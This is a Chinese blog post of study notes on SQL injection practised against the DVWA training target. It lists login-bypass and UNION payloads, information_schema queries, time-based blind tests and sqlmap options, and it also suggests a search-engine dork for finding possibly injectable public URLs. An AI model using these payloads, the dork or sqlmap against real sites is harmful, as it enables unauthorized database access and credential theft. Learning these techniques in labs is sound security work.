Sql注入学习

最新推荐文章于 2024-03-17 12:15:00 发布
最新推荐文章于 2024-03-17 12:15:00 发布
阅读量485 收藏 1
点赞数
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45794666/article/details/106583589
版权

Sql注入学习

  • 需要用到靶机DVWA.
  • 由于忘记了账号密码,用Navicat去本地服务器找到DVWA数据库里的user表
    user表
  • 可知默认账号有五个 密码通过md5加密,去百度使用在线解密即可

进入DVWA后,选择low安全级别

  • 方法一
    • 使用’ or 1==1 - -ddddd 获取了所有用户信息
    • 封闭前面语句 在给予一个绝对真的条件 在注释掉后面语句
    • 由于sql语句前面内容已经写死,想要查询更多的内容就需要union来进行联合查询
  • 方法二
    • 使用Union来联合查询
    • 问题1:Union 需要查询字段数相同
      • 可以通过数字补充来猜且同步字段数
      • 例:select * from dvwa.users union select user_login,user_pass,1,2,3,3 from …
    • 问题2:需要知道你想要查询的字段名称,表名称,库名称
      • 通过字典库来获取
    • 注意点
      • 字段名称不是union后的而是union前的
      • 不需要前面查询语句的信息可以通过加上where(假条件)来保证前面语句不成立即可
        • 例:select * from dvwa.users where 1=3 union select user_login,user_pass,1,2,3,3 from …

字典库:information_schema

TABLES表
select * from information_schema.TABLES;(\G更直观的看)

  • TABLE_SCHEMA: 库名字
  • TABLE_NAME: 表名字

COLUMNS表

  • TABLE_SCHEMA: 库名字
  • TABLE_NAME: 表名字
  • COLUMN_NAME 字段名字

所以

select DISTINCT TABLE_SCHEMA from information_schema.TABLES; 等价于 show databases
select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA=‘dvwa’; //等价于show tables
select TABLE_SCHEMA,GROUP_CONCAT(TABLE_NAME) from information_schema.TABLES GROUP BY TABLE_SCHEMA\G
通过库分组整合表
select COLUMN_NAME from information_schema.columns where TABLE_SCHEMA=’…’ and TABLE_NAME=’…’ 获得字段名

权限限制:查询时使用的用户是开发者定义的,所以能查询的库取决于定义用户的权限

手动注入实战

  1. 基于错误的注入
    • 使用单引号看是否有系统报错(是否有过滤)
    • 试探注入漏洞
  2. 基于布尔的注入
    • 'or 1=1 - - suibian
    • ’ 闭合前面的条件
    • or 1=1 给真条件
      • -suibian注释后面的语句
  3. 基于Union的注入
    • 先union select 1,2,3,…确认猜测字段数
      • 字段少了:补充1,2,3…即可
      • 字段多了:通过concat来合字段
    • ’ union select user() ,database(),version() – suibian 获取当前库和当前用户,当前数据库版本信息*
    • 通过字典库获取
  4. 基于时间的盲注
    • 真条件’ and sleep(5) – suibian 确认是否有注入点
    • 通过字典库获取

sqlmap自动化注入

  • -u URL, 包含目标参数的url (“http://www.site.com/vuln.php?id=1”)
    • 百度获取有可能注入url:搜索 inurl .php?id=
    • -batch 自己判断数据库
    • -p 指定参数
    • -dbs 获取所有数据库信息 -user 获取所有用户
    • -D 指定库 -T 指定表 -C 指定列
    • –sql-shell 进入交互模式 -q退出

!!POST传参时,-cookie=…而不是-cookie:…

在这里插入图片描述
在这里插入图片描述

Mysql基础

Mysql 进入 show databases(user); 查看所有数据库(表)
use []数据库名]; 选择数据库
select database(); 查看当前数据库
select user(); 查看当前用户名
select version(); 查看当前数据库版本信息
describe users; 查看表数据结构
limit (数字) 来限制查询行

6ri9ht
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL 注入天书.pdf
08-06
总的来说,《SQL注入天书》及配套的sqli-labs提供了全面的SQL注入学习路径,从基础到高级,从理论到实践,有助于安全专业人士和开发人员增强对这一重要安全威胁的理解和应对能力。通过深入学习和实践,可以有效地...
SQL注入
qq_63785498的博客
06-10 2351
SQL注入语句:1、1';-- -查看有哪些库2、1';-- -查看有哪些表3、1';-- -查看表里面有哪些字段4、1';-- -查看表里面所有字段的内容。
SQL注入—MYSQL基础语句(持续更新)附图
weixin_44431280的博客
03-19 5580
SQL注入—mysql基础语句 简介:常见的Web安全漏洞中,SQL注入利用和危害极大,通过其可以直接获取数据表的内容,从而获得Web站点的账号和密码,在学习SQL注入时,我们需要先对常见的数据库基础进行学习和了解。 MYSQL基础语句 一:数据库操作 1,在当前数据库管理系统中创建/删除数据库:create/drop dadabase websec; 2,查看当前数据库管理系统下所有数据库:show databases; 3,使用(进入)操作的数据库,use websec; 二:数据表操作 1,创建数据
【网络安全sql注入语法汇总
m0_72061943的博客
07-08 1387
目录一、原理二、SQL注入判断方法1.字符型检测2.数字型检测3.搜索型检测和xx型检测三、union注入1.order by判断列数2.union 联合查询四、盲注1.布尔盲注(1)查询数据库长度(2)查询当前数据库名称(3)查询数据库下有多少表(4)查询数据库下表名第一位(5)查询数据库下表中有多少个字段(6)判断数据库下表中的第一个字段的长度(7)查询数据库下表里面的第一个字段的第一位是多少(8)得到字段探测第一条数据2.时间盲注(1)判断是否存在延迟函数(2)查询当前数据库的长度,如果正确那么就延迟
【超详细版】学习SQL注入看这篇就够了(原理及思路绕过)
MachineGunJoe666
04-27 5034
当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
sql注入学习
qq_42685664的博客
03-18 1635
sql注入学习
SQL注入学习
07-29
SQL注入是黑客入门的基础,非常重要。这是学习SQL注入的基本步骤
sql注入学习入门篇
12-16
SQL注入学习入门篇 SQL注入是一种常见的网络攻击手段,它能够让攻击者获取到网站的敏感信息,从而导致严重的安全隐患。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
sql注入学习-知识点大合集
weixin_49349476的博客
05-27 1704
SQL注入是Web应用程序攻击中最常见的攻击方式之一,是影响Web安全的主要问题之一
sql注入详解
m0_67392811的博客
06-12 5831
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SQL注入详解(全网最全,万字长文)
热门推荐
m0_56691564的博客
10-23 3万+
一些概念:SQL:用于数据库中的标准数据查询语言。 web分为前端和后端,前端负责进行展示,后端负责处理来自前端的请求并提供前端展示的资源。而数据库就是存储资源的地方。而服务器获取数据的方法就是使用SQL语句进行查询获取。
SQL注入总结
qq_46081990的博客
04-22 3967
SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的sql服务器加以解析和执行。由于sql语句本身的多样性,以及可用于构造sql语句的编程方法很多,因此凡是构造sql语句的步骤均存在被攻击的潜在风险。Sql注入的方式主要是直接将代码插入参数中,这些参数会被置入sql命令中加以执行。间接的攻击方式是将恶意代码插入字符串中,之后将这些字符串保存到数据库的数据表中或将其当成元数据。当将存储的字符串置入动态sql命令中时,恶意代码就将被执行。
网络安全威胁——SQL注入攻击
聚集机器学习、信息安全
04-04 9221
随着互联网的发展和普及,网络安全问题越来越突出。SQL注入SQL Injection)攻击是其中最普遍的安全隐患之一,它利用应用程序对用户输入数据的信任,将恶意SQL代码注入到应用程序中,导致敏感信息泄露、数据损坏或删除及系统瘫痪,给企业和个人带来巨大损失。
sql注入方式及知识点总结(超详细)
qq_67473072的博客
07-22 3726
sql注入方式及知识点总结(超详细)
SQL注入学习(一)
qing_chuan_的博客
05-20 102
*SQL注入SQL Injection)**是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。那什么是SQL了?结构化查询语言(Structured Query Language,缩写:SQL),是一种关系型数据库查询的标准编程语言,用于存取数据以及查询、更新、删除和管理关系型数据库(即SQL是一种数据库查询语言)
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
03-17 5492
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
SQL注入学习指南:Sqli-labs实战教程
"《SQL注入天书》是一本由Lcamry编写的关于MySQL注入技术的学习指南,发布于2016年7月。该文档旨在帮助读者深入了解SQL注入原理、实战技巧以及渗透测试中的相关知识。SQL注入是一种常见的网络安全漏洞,黑客通过构造...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值